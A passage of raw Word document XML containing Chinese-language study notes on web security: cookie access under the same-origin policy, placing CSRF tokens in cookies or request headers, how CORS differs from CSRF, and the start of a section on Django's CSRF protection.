        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括包含用户身份验证信息的会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然而，由于同源策略的限制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常不能直接访问不属于当前域的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980818E" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F71150" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌，即使攻击者能够读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也不应该直接从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌通常应该以一种防止跨站请求伪造攻击的方式来防护。这通常涉及将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌嵌入到页面中，并在每个请求中包含该令牌，以确保请求是合法的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5FCCAD" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3C05E8" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在设计中，通常有两种主要的方式来处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB65D4" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613E59F8" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    CSRF Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这种情况下，服务器将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌放置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，同时也将其嵌入到表单或请求头中。浏览器在发起请求时会自动携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌，这样服务器就可以验证请求的合法性。这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300E64C6" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333CC610" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    CSRF Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入请求头：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌可以作为请求头的一部分发送，而不是放入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。这种方法通常需要在每个请求中手动设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌，而不依赖浏览器自动发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这种方式可以提高安全性，但在某些情况下可能需要更多的前端开发工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D872E40" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C932861" w14:textId="0606304F" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无论使用哪种方式，关键是确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌不容易被恶意攻击者获取。将其嵌入到请求头中通常能提供一些额外的安全性，但需要更多的前端协作。总体而言，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或请求头来传递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌都是合理的，具体选择取决于你的应用的需求和安全策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F24427" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E4A661" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cross-Origin Resource Sharing</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）是两个不同的安全问题，它们分别解决不同的攻击向量。虽然启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以解决跨域资源共享的问题，</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>但并不代表你就可以不考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保护。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF840B" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20098BAA" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>主要解决浏览器的同源策略，允许一个域的网页向另一个域请求资源。</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是为了使服务器能够声明哪些来源可以访问资源，以及哪些</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法是被允许的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FC14A" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE70722" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是一种攻击，攻击者利用已经认证用户的权限，在用户不知情的情况下执行恶意操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保护通常涉及在请求中包含一些特殊的令牌（</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>令牌），以确保请求是来自合法的来源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73094F42" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473281C0" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>即使你启用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>并限制了来源，仍然需要考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保护，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>主要是关注跨域</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>访问问题，而不是用户身份验证和请求合法性的问题。</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>攻击不仅仅受同源策略的影响，而且可能跨越同一个域内的不同子域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A87671" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRPr="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E17A86" w14:textId="14D4C923" w:rsidR="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所以，综合来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是两个独立但可以一起使用的安全机制。在处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>应用程序的安全性时，最好同时考虑启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以及实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00896ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>保护来确保全面的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78FCB6" w14:textId="77777777" w:rsidR="00896ECF" w:rsidRDefault="00896ECF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706CA137" w14:textId="54135442" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="651" w:name="_Toc159780081"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="651"/>
    </w:p>
    <w:p w14:paraId="3B15F1AD" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）保护机制是基于同步令牌的方式实现的。每次用户请求时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会生成一个唯一的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌，并将其包含在页面的表单中（通常是一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> csrfmiddlewaretoken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字段）。当用户提交表单时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会验证请求中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌是否与服务器端生成的匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E54C58" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAEA549" w14:textId="77777777" w:rsidR="00E51881" w:rsidRDefault="00E51881" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
